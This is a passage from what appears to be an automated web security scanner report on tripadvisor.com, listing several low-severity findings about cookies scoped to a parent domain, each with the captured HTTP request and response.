Server: Apache
pragma: no-cache
cache-control: no-cache,no-store,must-revalidate
expires: 0
Set-Cookie: TATravelInfo=V2*AY.2011*AM.10*AD.14*DY.2011*DM.10*DD.16*A.2*MG.-1*HP.2*FL.3; Domain=.tripadvisor.com; Expires=Thu, 30-Sep-2021 01:02:04 GMT; Path=/
Set-Cookie: TASession=%1%V2ID.ED9DF178C3DE113EA2B4AD10BB57FE25*SQ.6*MC.11893*LS.CheckMore_SmartDeals*PD-2147.1*GR.40*TCPAR.23*TBR.94*EXEX.44*ABTR.7*PPRP.12*PHTB.18*FS.94*HS.popularity*ES.popularity*AS.popularity*DS.5*SAS.popularity*CU.USD*TFT.5*DF.0*FP.%2FSmartDeals%3Fcheckin%3D10%252F9%252F2011%26q%3Dbos%26args%3Dg1-m11893%26adults%3D1%26checkout%3D10%252F16%252F2011*RP.http%3A%2F%2Fwww%5C.hotwire%5C.com%2Fhotel%2Fdetails%5C.jsp%3FactionType%3D2%26inputId%3Dhotel-results%26searchId%3D6111849947%26selectedSolutionId%3D135420317134%26selectedPGoodId%3D236179701665*LR.http%3A%2F%2Fwww%5C.trip%5C.com%2Fhotels%5C.html*LP.%2FSmartDeals-g60745-Boston_Massachusetts-Hotel-Deals-a_checkin%5C.10%252F9%252F2011-qbos-a_adults%5C.1-m11893-a_checkout%5C.10%252F16%252F2011*FS.37*FBH.6*TRA.true*LL.4139280*LD.258705*EWS.CheckMore; Domain=.tripadvisor.com; Path=/
Set-Cookie: ServerPool=T; Domain=.tripadvisor.com; Path=/
Set-Cookie: PassThruUrlArgs=null; Domain=.tripadvisor.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Vary: Accept-Encoding
Content-Length: 16671
Connection: close
Content-Type: text/html;charset=UTF-8

<div id="CHECK_MORE_SITES_LB" class="checking_rates">
<dl class="property zoom_wrap">
<dt class="heading">
You're checking rates on: </dt>
<dd class="details zoom_wrap">
<img class="thumbnail" src="ht
...[SNIP]...
13.22. http://www.tripadvisor.com/Commerce  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.tripadvisor.com
Path:   /Commerce

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Commerce?p=Expedia&src=32623573&geo=258705&matchID=1&from=HotelDateSearch_SmartDeals&area=QC_Inline&slot=1&cnt=6&oos=4&silo=910&bucket=1739&ttype=Hotel&inMonth=10%202011&inDay=14&outMonth=10%202011&outDay=16&adults=NaN&pid=4799 HTTP/1.1
Host: www.tripadvisor.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.tripadvisor.com/SmartDeals-g60745-Boston_Massachusetts-Hotel-Deals.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=635C14B6E6425746; TAUnique=%1%enc%3AApKTEaYI6mNVaPDGh0MhGA7WhW0nFykhd5HXfiPeVIfT5BsMYvhPlw%3D%3D; BEPIN=%1%132c736d105%3Bbak14b%3A7724%3Brev03b%3A8754%3Bbak02b%3A5465%3Bmed02b%3A8739%3B; CM=%1%sh%2C%2C-1%7CWShadeSeen%2C%2C-1%7C; TAReturnTo=%1%%2FSmartDeals-g60745-Boston_Massachusetts-Hotel-Deals.html; TACds=C.2.11007.0.2011-10-02; TATravelInfo=V2*A.2*MG.-1*HP.2*FL.3; TASession=%1%V2ID.ED9DF178C3DE113EA2B4AD10BB57FE25*SQ.4*MC.11893*LS.HotelCheckRates*GR.40*TCPAR.23*TBR.94*EXEX.44*ABTR.7*PPRP.12*PHTB.18*FS.0*HS.popularity*ES.popularity*AS.popularity*DS.5*SAS.popularity*TFT.5*DF.0*FP.%2FSmartDeals%3Fcheckin%3D10%252F9%252F2011%26q%3Dbos%26args%3Dg1-m11893%26adults%3D1%26checkout%3D10%252F16%252F2011*RP.http%3A%2F%2Fwww%5C.hotwire%5C.com%2Fhotel%2Fdetails%5C.jsp%3FactionType%3D2%26inputId%3Dhotel-results%26searchId%3D6111849947%26selectedSolutionId%3D135420317134%26selectedPGoodId%3D236179701665*LR.http%3A%2F%2Fwww%5C.trip%5C.com%2Fhotels%5C.html*LP.%2FSmartDeals-g60745-Boston_Massachusetts-Hotel-Deals-a_checkin%5C.10%252F9%252F2011-qbos-a_adults%5C.1-m11893-a_checkout%5C.10%252F16%252F2011*FS.37*FBH.6*TRA.true*LL.971923*LD.60745*EWS.SmartDeals; ServerPool=T

Response

HTTP/1.1 302 Moved Temporarily
Date: Mon, 03 Oct 2011 01:01:57 GMT
Server: Apache
pragma: no-cache
cache-control: no-cache,no-store,must-revalidate
expires: 0
Set-Cookie: TATravelInfo=V2*AY.2011*AM.10*AD.14*DY.2011*DM.10*DD.16*A.2*MG.-1*HP.2*FL.3; Domain=.tripadvisor.com; Expires=Thu, 30-Sep-2021 01:01:57 GMT; Path=/
Set-Cookie: TASession=%1%V2ID.ED9DF178C3DE113EA2B4AD10BB57FE25*SQ.5*MC.11893*LS.HotelCheckRates*PD-2332.1*GR.40*TCPAR.23*TBR.94*EXEX.44*ABTR.7*PPRP.12*PHTB.18*FS.6*HS.popularity*ES.popularity*AS.popularity*DS.5*SAS.popularity*TFT.5*DF.0*FP.%2FSmartDeals%3Fcheckin%3D10%252F9%252F2011%26q%3Dbos%26args%3Dg1-m11893%26adults%3D1%26checkout%3D10%252F16%252F2011*RP.http%3A%2F%2Fwww%5C.hotwire%5C.com%2Fhotel%2Fdetails%5C.jsp%3FactionType%3D2%26inputId%3Dhotel-results%26searchId%3D6111849947%26selectedSolutionId%3D135420317134%26selectedPGoodId%3D236179701665*LR.http%3A%2F%2Fwww%5C.trip%5C.com%2Fhotels%5C.html*LP.%2FSmartDeals-g60745-Boston_Massachusetts-Hotel-Deals-a_checkin%5C.10%252F9%252F2011-qbos-a_adults%5C.1-m11893-a_checkout%5C.10%252F16%252F2011*FS.37*FBH.6*TRA.true*LL.971923*LD.60745*EWS.SmartDeals; Domain=.tripadvisor.com; Path=/
Set-Cookie: PCT=%7B%22p-2332%22%3A1%7D; Domain=.tripadvisor.com; Path=/
Set-Cookie: ServerPool=T; Domain=.tripadvisor.com; Path=/
Location: http://www.expedia.com/pubspec/scripts/eap.asp?GOTO=HotAvail&HotID=894999&InDate=10/14/11&OutDate=10/16/11&NumAdult=2&NumChild=0&eapid=21187-1&ICMCID=TRIPA.Expedia_US-H_B4.11893.T&ICMDTL=MT1110027Z3xeMPeET6itK0Qu1f-JQAAU.894999.HDSSDeE.T.QCI.258705.ch.668.60745.en_US..
Vary: Accept-Encoding
Content-Length: 0
Connection: close
Content-Type: text/html;charset=UTF-8

13.23. http://www.tripadvisor.com/HotelCheckRates  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.tripadvisor.com
Path:   /HotelCheckRates

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /HotelCheckRates?Action=AddBoomerangTag HTTP/1.1
Host: www.tripadvisor.com
Proxy-Connection: keep-alive
Content-Length: 55
Origin: http://www.tripadvisor.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-type: application/x-www-form-urlencoded; charset=UTF-8
Accept: text/javascript, text/html, application/xml, text/xml, */*
Referer: http://www.tripadvisor.com/SmartDeals-g60745-Boston_Massachusetts-Hotel-Deals.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=635C14B6E6425746; TAUnique=%1%enc%3AApKTEaYI6mNVaPDGh0MhGA7WhW0nFykhd5HXfiPeVIfT5BsMYvhPlw%3D%3D; TATravelInfo=V2*A.2*MG.-1*HP.2*FL.3; ServerPool=T; BEPIN=%1%132c736d105%3Bbak14b%3A7724%3Brev03b%3A8754%3Bbak02b%3A5465%3Bmed02b%3A8739%3B; CM=%1%sh%2C%2C-1%7CWShadeSeen%2C%2C-1%7C; TAReturnTo=%1%%2FSmartDeals-g60745-Boston_Massachusetts-Hotel-Deals.html; TASession=%1%V2ID.ED9DF178C3DE113EA2B4AD10BB57FE25*SQ.3*MC.11893*LS.SmartDeals*GR.40*TCPAR.23*TBR.94*EXEX.44*ABTR.7*PPRP.12*PHTB.18*HS.popularity*ES.popularity*AS.popularity*DS.5*SAS.popularity*TFT.5*DF.0*FP.%2FSmartDeals%3Fcheckin%3D10%252F9%252F2011%26q%3Dbos%26args%3Dg1-m11893%26adults%3D1%26checkout%3D10%252F16%252F2011*RP.http%3A%2F%2Fwww%5C.hotwire%5C.com%2Fhotel%2Fdetails%5C.jsp%3FactionType%3D2%26inputId%3Dhotel-results%26searchId%3D6111849947%26selectedSolutionId%3D135420317134%26selectedPGoodId%3D236179701665*LR.http%3A%2F%2Fwww%5C.trip%5C.com%2Fhotels%5C.html*LP.%2FSmartDeals-g60745-Boston_Massachusetts-Hotel-Deals-a_checkin%5C.10%252F9%252F2011-qbos-a_adults%5C.1-m11893-a_checkout%5C.10%252F16%252F2011*FS.37*FBH.2*TRA.true*LL.971922*LD.60745*EWS.SmartDeals; TACds=C.2.11007.0.2011-10-02

checkIn=10%2F14%2F2011&checkOut=10%2F16%2F2011&adults=2

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:02:05 GMT
Server: Apache
pragma: no-cache
cache-control: no-cache,no-store,must-revalidate
expires: 0
Set-Cookie: TATravelInfo=V2*AY.2011*AM.10*AD.14*DY.2011*DM.10*DD.16*A.2*MG.-1*HP.2*FL.3; Domain=.tripadvisor.com; Expires=Thu, 30-Sep-2021 01:02:05 GMT; Path=/
Set-Cookie: TASession=%1%V2ID.ED9DF178C3DE113EA2B4AD10BB57FE25*SQ.7*MC.11893*LS.HotelCheckRates*PD-2147.1*GR.40*TCPAR.23*TBR.94*EXEX.44*ABTR.7*PPRP.12*PHTB.18*FS.25*HS.popularity*ES.popularity*AS.popularity*DS.5*SAS.popularity*CU.USD*TFT.5*DF.0*FP.%2FSmartDeals%3Fcheckin%3D10%252F9%252F2011%26q%3Dbos%26args%3Dg1-m11893%26adults%3D1%26checkout%3D10%252F16%252F2011*RP.http%3A%2F%2Fwww%5C.hotwire%5C.com%2Fhotel%2Fdetails%5C.jsp%3FactionType%3D2%26inputId%3Dhotel-results%26searchId%3D6111849947%26selectedSolutionId%3D135420317134%26selectedPGoodId%3D236179701665*LR.http%3A%2F%2Fwww%5C.trip%5C.com%2Fhotels%5C.html*LP.%2FSmartDeals-g60745-Boston_Massachusetts-Hotel-Deals-a_checkin%5C.10%252F9%252F2011-qbos-a_adults%5C.1-m11893-a_checkout%5C.10%252F16%252F2011*FS.37*FBH.6*TRA.true*LL.4139281*LD.258705*EWS.CheckMore; Domain=.tripadvisor.com; Path=/
Set-Cookie: ServerPool=T; Domain=.tripadvisor.com; Path=/
Set-Cookie: PassThruUrlArgs=null; Domain=.tripadvisor.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Vary: Accept-Encoding
Content-Length: 19
Connection: close
Content-Type: text/html;charset=UTF-8

<!--check rates-->
13.24. http://www.tripadvisor.com/SmartDeals-g1-m11893  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.tripadvisor.com
Path:   /SmartDeals-g1-m11893

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /SmartDeals-g1-m11893?&q=bos&checkin=10/9/2011&checkout=10/16/2011&adults=1 HTTP/1.1
Host: www.tripadvisor.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.trip.com/hotels.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=635C14B6E6425746; TAUnique=%1%enc%3AApKTEaYI6mNVaPDGh0MhGA7WhW0nFykhd5HXfiPeVIfT5BsMYvhPlw%3D%3D; TACds=A.1.11539.1.2011-10-02

Response

HTTP/1.1 302 Moved Temporarily
Date: Mon, 03 Oct 2011 00:37:46 GMT
Server: Apache
Set-Cookie: TATravelInfo=V2*A.2*MG.-1*HP.2*FL.3; Domain=.tripadvisor.com; Expires=Thu, 30-Sep-2021 00:37:46 GMT; Path=/
Set-Cookie: TASession=%1%V2ID.ED9DF178C3DE113EA2B4AD10BB57FE25*SQ.3*MC.11893*LS.SmartDeals*GR.40*TCPAR.23*TBR.94*EXEX.44*ABTR.7*PPRP.12*PHTB.18*FS.50*HS.popularity*ES.popularity*AS.popularity*DS.5*SAS.popularity*TFT.5*DF.0*FP.%2FSmartDeals%3Fcheckin%3D10%252F9%252F2011%26q%3Dbos%26args%3Dg1-m11893%26adults%3D1%26checkout%3D10%252F16%252F2011*RP.http%3A%2F%2Fwww%5C.trip%5C.com%2Fhotels%5C.html*LR.http%3A%2F%2Fwww%5C.trip%5C.com%2Fhotels%5C.html*LP.%2FSmartDeals%3Fcheckin%3D10%252F9%252F2011%26q%3Dbos%26args%3Dg1-m11893%26adults%3D1%26checkout%3D10%252F16%252F2011*FS.37*TRA.true*LL.971922*LD.60745*EWS.SmartDeals; Domain=.tripadvisor.com; Path=/
Set-Cookie: ServerPool=T; Domain=.tripadvisor.com; Path=/
Set-Cookie: PassThruUrlArgs=%1%a_checkin.10%2F9%2F2011-qbos-a_adults.1-m11893-a_checkout.10%2F16%2F2011; Domain=.tripadvisor.com; Expires=Mon, 10-Oct-2011 00:37:46 GMT; Path=/
Location: http://www.tripadvisor.com/SmartDeals-g60745-Boston_Massachusetts-Hotel-Deals.html
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=utf-8

13.25. http://www.tripadvisor.com/SmartDeals-g60745-Boston_Massachusetts-Hotel-Deals.html  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.tripadvisor.com
Path:   /SmartDeals-g60745-Boston_Massachusetts-Hotel-Deals.html

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /SmartDeals-g60745-Boston_Massachusetts-Hotel-Deals.html HTTP/1.1
Host: www.tripadvisor.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.trip.com/hotels.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=635C14B6E6425746; TAUnique=%1%enc%3AApKTEaYI6mNVaPDGh0MhGA7WhW0nFykhd5HXfiPeVIfT5BsMYvhPlw%3D%3D; TACds=A.1.11539.1.2011-10-02; TATravelInfo=V2*A.2*MG.-1*HP.2*FL.3; TASession=%1%V2ID.ED9DF178C3DE113EA2B4AD10BB57FE25*SQ.1*MC.11893*GR.40*TCPAR.23*TBR.94*EXEX.44*ABTR.7*PPRP.12*PHTB.18*FS.37*HS.popularity*ES.popularity*AS.popularity*DS.5*SAS.popularity*DF.0*FP.%2FSmartDeals%3Fcheckin%3D10%252F9%252F2011%26q%3Dbos%26args%3Dg1-m11893%26adults%3D1%26checkout%3D10%252F16%252F2011*RP.http%3A%2F%2Fwww%5C.trip%5C.com%2Fhotels%5C.html*LR.http%3A%2F%2Fwww%5C.trip%5C.com%2Fhotels%5C.html*LP.%2FSmartDeals%3Fcheckin%3D10%252F9%252F2011%26q%3Dbos%26args%3Dg1-m11893%26adults%3D1%26checkout%3D10%252F16%252F2011*TRA.true; ServerPool=T; PassThruUrlArgs=%1%a_checkin.10%2F9%2F2011-qbos-a_adults.1-m11893-a_checkout.10%2F16%2F2011; BEPIN=%1%132c736d105%3Bbak14b%3A7724%3B

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:38:20 GMT
Server: Apache
pragma: no-cache
cache-control: no-cache,no-store,must-revalidate
expires: 0
Set-Cookie: TATravelInfo=V2*AC.DFW*A.2*MG.-1*HP.2*FL.3; Domain=.tripadvisor.com; Expires=Thu, 30-Sep-2021 00:38:21 GMT; Path=/
Set-Cookie: TASession=%1%V2ID.ED9DF178C3DE113EA2B4AD10BB57FE25*SQ.58*MC.13091*LS.SmartDeals*GR.40*TCPAR.23*TBR.94*EXEX.44*ABTR.7*PPRP.12*PHTB.18*FS.37*HS.popularity*ES.popularity*AS.popularity*DS.5*SAS.popularity*CU.USD*TFT.5*DF.0*FP.%2FSmartDeals%3Fcheckin%3D10%252F9%252F2011%26q%3Dbos%26args%3Dg1-m11893%26adults%3D1%26checkout%3D10%252F16%252F2011*RP.http%3A%2F%2Fwww%5C.trip%5C.com%2Fhotels%5C.html*LR.http%3A%2F%2Fwww%5C.trip%5C.com%2Fhotels%5C.html*LP.%2FSmartDeals-g60745-Boston_Massachusetts-Hotel-Deals%5C.html*FS.37*TRA.true*LL.971922*LD.60745*EWS.SmartDeals; Domain=.tripadvisor.com; Path=/
Set-Cookie: ServerPool=T; Domain=.tripadvisor.com; Path=/
Set-Cookie: CM=%1%sh%2C%2C-1%7CWShadeSeen%2C%2C-1%7C; Domain=.tripadvisor.com; Expires=Thu, 30-Sep-2021 00:38:21 GMT; Path=/
Set-Cookie: PassThruUrlArgs=null; Domain=.tripadvisor.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Vary: Accept-Encoding
Content-Length: 356474
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta http-equiv="content-type" content="text/html
...[SNIP]...
13.26. http://www.tripadvisor.com/img/cdsi/img2/ratings/partner/e5.0-13878-5.gif  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.tripadvisor.com
Path:   /img/cdsi/img2/ratings/partner/e5.0-13878-5.gif

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /img/cdsi/img2/ratings/partner/e5.0-13878-5.gif HTTP/1.1
Host: www.tripadvisor.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.expedia.com/Boston-Hotels-Hotel-Commonwealth.h894999.Hotel-Information?icmcid=TRIPA.Expedia_US-H_B4.11893.T&icmdtl=MT1110027Z3xeMPeET6itK0Qu1f-JQAAU.894999.HDSSDeE.T.QCI.258705.ch.668.60745.en_US..&chkin=10/14/11&hashTag=roomsAndRates&chkout=10/16/11&eapid=21187-1&rm1=a2&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=635C14B6E6425746; TAUnique=%1%enc%3AApKTEaYI6mNVaPDGh0MhGA7WhW0nFykhd5HXfiPeVIfT5BsMYvhPlw%3D%3D; BEPIN=%1%132c736d105%3Bbak14b%3A7724%3Brev03b%3A8754%3Bbak02b%3A5465%3Bmed02b%3A8739%3B; CM=%1%sh%2C%2C-1%7CWShadeSeen%2C%2C-1%7C; TAReturnTo=%1%%2FSmartDeals-g60745-Boston_Massachusetts-Hotel-Deals.html; TACds=C.2.11007.0.2011-10-02; TATravelInfo=V2*AY.2011*AM.10*AD.14*DY.2011*DM.10*DD.16*A.2*MG.-1*HP.2*FL.3; TASession=%1%V2ID.ED9DF178C3DE113EA2B4AD10BB57FE25*SQ.5*MC.11893*LS.HotelCheckRates*PD-2147.1*GR.40*TCPAR.23*TBR.94*EXEX.44*ABTR.7*PPRP.12*PHTB.18*FS.58*HS.popularity*ES.popularity*AS.popularity*DS.5*SAS.popularity*TFT.5*DF.0*FP.%2FSmartDeals%3Fcheckin%3D10%252F9%252F2011%26q%3Dbos%26args%3Dg1-m11893%26adults%3D1%26checkout%3D10%252F16%252F2011*RP.http%3A%2F%2Fwww%5C.hotwire%5C.com%2Fhotel%2Fdetails%5C.jsp%3FactionType%3D2%26inputId%3Dhotel-results%26searchId%3D6111849947%26selectedSolutionId%3D135420317134%26selectedPGoodId%3D236179701665*LR.http%3A%2F%2Fwww%5C.trip%5C.com%2Fhotels%5C.html*LP.%2FSmartDeals-g60745-Boston_Massachusetts-Hotel-Deals-a_checkin%5C.10%252F9%252F2011-qbos-a_adults%5C.1-m11893-a_checkout%5C.10%252F16%252F2011*FS.37*FBH.6*TRA.true*LL.971923*LD.60745*EWS.SmartDeals; PCT=%7B%22p-2147%22%3A1%7D; ServerPool=T

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:02:16 GMT
Server: Apache
expires: Mon, 03 Oct 2011 01:00:00 GMT
cache-control: max-age=43200
Last-Modified: Sun, 02 Oct 2011 01:00:00 GMT
Set-Cookie: TASession=%1%V2ID.ED9DF178C3DE113EA2B4AD10BB57FE25*SQ.6*MC.11893*LS.HotelCheckRates*PD-2147.1*GR.40*TCPAR.23*TBR.94*EXEX.44*ABTR.7*PPRP.12*PHTB.18*HS.popularity*ES.popularity*AS.popularity*DS.5*SAS.popularity*TFT.5*DF.0*FP.%2FSmartDeals%3Fcheckin%3D10%252F9%252F2011%26q%3Dbos%26args%3Dg1-m11893%26adults%3D1%26checkout%3D10%252F16%252F2011*RP.http%3A%2F%2Fwww%5C.expedia%5C.com%2FBoston-Hotels-Hotel-Commonwealth%5C.h894999%5C.Hotel-Information%3Ficmdtl%3DMT1110027Z3xeMPeET6itK0Qu1f-JQAAU%5C.894999%5C.HDSSDeE%5C.T%5C.QCI%5C.258705%5C.ch%5C.668%5C.60745%5C.en_US%5C.%5C.%3Fchkin%3D10%2F14%2F11%3FhashTag%3DroomsAndRates%3Fchkout%3D10%2F16%2F11%3Feapid%3D21187-1%3Frm1%3Da2%3F*LR.http%3A%2F%2Fwww%5C.trip%5C.com%2Fhotels%5C.html*LP.%2FSmartDeals-g60745-Boston_Massachusetts-Hotel-Deals-a_checkin%5C.10%252F9%252F2011-qbos-a_adults%5C.1-m11893-a_checkout%5C.10%252F16%252F2011*FS.37*FBH.6*TRA.true*LL.971923*LD.60745*EWS.SmartDeals; Domain=.tripadvisor.com; Path=/
Set-Cookie: TACds=C.3.13878.5.2011-10-02; Domain=.tripadvisor.com; Expires=Fri, 02-Dec-2011 01:02:16 GMT; Path=/
Connection: close
Content-Type: image/gif
Content-Length: 2673

GIF89aC..............t......rtrd.N...z.g),*.................p...n.Y[.Edd].........CEC.......\j............]T7.............................RUU.......... 4............STOC=).tL.....].....T..A...X.B....
...[SNIP]...
13.27. http://www.tripadvisor.com/img/cdsi/img2/ratings/traveler/3.0-11539-1.gif  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.tripadvisor.com
Path:   /img/cdsi/img2/ratings/traveler/3.0-11539-1.gif

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /img/cdsi/img2/ratings/traveler/3.0-11539-1.gif HTTP/1.1
Host: www.tripadvisor.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm?hotelID=113791&inDate=10/04/11&outDate=10/07/11&NumRooms=1&hrnQuoteKey=c6d7ef83-2fb9-429a-9916-19c05c46dbab
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=635C14B6E6425746

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:28:31 GMT
Server: Apache
expires: Mon, 03 Oct 2011 01:00:00 GMT
cache-control: max-age=43200
Last-Modified: Sun, 02 Oct 2011 01:00:00 GMT
Set-Cookie: TASession=%1%V2ID.CA5B1B8B5844B487705CCB63281E5A9D*SQ.1*MC.11539*GR.52*TBR.4*EXEX.78*ABTR.50*HS.popularity*ES.popularity*AS.popularity*DS.5*SAS.popularity*FP.CDSimp*RP.http%3A%2F%2Fwww%5C.hotelplanner%5C.com%2FHotel%2FHotelRoomTypes%5C.cfm%3FhotelID%3D113791%26inDate%3D10%2F04%2F11%26outDate%3D10%2F07%2F11%26NumRooms%3D1%26hrnQuoteKey%3Dc6d7ef83-2fb9-429a-9916-19c05c46dbab*TRA.true; Domain=.tripadvisor.com; Path=/
Set-Cookie: TAUnique=%1%enc%3AApKTEaYI6mNVaPDGh0MhGA7WhW0nFykhd5HXfiPeVIfT5BsMYvhPlw%3D%3D; Domain=.tripadvisor.com; Expires=Thu, 30-Sep-2021 00:28:31 GMT; Path=/
Set-Cookie: TACds=A.1.11539.1.2011-10-02; Domain=.tripadvisor.com; Expires=Fri, 02-Dec-2011 00:28:31 GMT; Path=/
Connection: close
Content-Type: image/gif
Content-Length: 1285

GIF89av....:............q......m.Z.....n000...@@@...w.f...............w.e```......ppp.....}............ ..}PPP.......!.YL)we7..<3......`.r>hX0.....g...........S..L......b.NX.B...................
...[SNIP]...
13.28. http://www.tripadvisor.com/img/cdsi/img2/ratings/traveler/4.0-11539-1.gif  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.tripadvisor.com
Path:   /img/cdsi/img2/ratings/traveler/4.0-11539-1.gif

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /img/cdsi/img2/ratings/traveler/4.0-11539-1.gif HTTP/1.1
Host: www.tripadvisor.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm?hotelID=113791&inDate=10/04/11&outDate=10/07/11&NumRooms=1&hrnQuoteKey=c6d7ef83-2fb9-429a-9916-19c05c46dbab
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=635C14B6E6425746

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:28:31 GMT
Server: Apache
expires: Mon, 03 Oct 2011 01:00:00 GMT
cache-control: max-age=43200
Last-Modified: Sun, 02 Oct 2011 01:00:00 GMT
Set-Cookie: TASession=%1%V2ID.D003686BE8331A8DC70A23D10F4589D0*SQ.1*MC.11539*GR.23*TBR.31*EXEX.3*ABTR.21*HS.popularity*ES.popularity*AS.popularity*DS.5*SAS.popularity*FP.CDSimp*RP.http%3A%2F%2Fwww%5C.hotelplanner%5C.com%2FHotel%2FHotelRoomTypes%5C.cfm%3FhotelID%3D113791%26inDate%3D10%2F04%2F11%26outDate%3D10%2F07%2F11%26NumRooms%3D1%26hrnQuoteKey%3Dc6d7ef83-2fb9-429a-9916-19c05c46dbab*TRA.true; Domain=.tripadvisor.com; Path=/
Set-Cookie: TAUnique=%1%enc%3AYlcHw2yynj9VaPDGh0MhGA7WhW0nFykhjayN3jcE9A%2FT5BsMYvhPlw%3D%3D; Domain=.tripadvisor.com; Expires=Thu, 30-Sep-2021 00:28:31 GMT; Path=/
Set-Cookie: TACds=A.1.11539.1.2011-10-02; Domain=.tripadvisor.com; Expires=Fri, 02-Dec-2011 00:28:31 GMT; Path=/
Connection: close
Content-Type: image/gif
Content-Length: 1307

GIF89av....:.........q.........m.Z.....n000...@@@...w.f...............w.e...```.....}...ppp...........} ...PPP........we7.!.YL)..`hX0.r>...<3...............g........L..Sb.NX.B...................
...[SNIP]...
13.29. http://www.tripadvisor.com/img/cdsi/langs/en/tripadvisor_logo_207x51-12811-0.gif  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.tripadvisor.com
Path:   /img/cdsi/langs/en/tripadvisor_logo_207x51-12811-0.gif

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /img/cdsi/langs/en/tripadvisor_logo_207x51-12811-0.gif HTTP/1.1
Host: www.tripadvisor.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
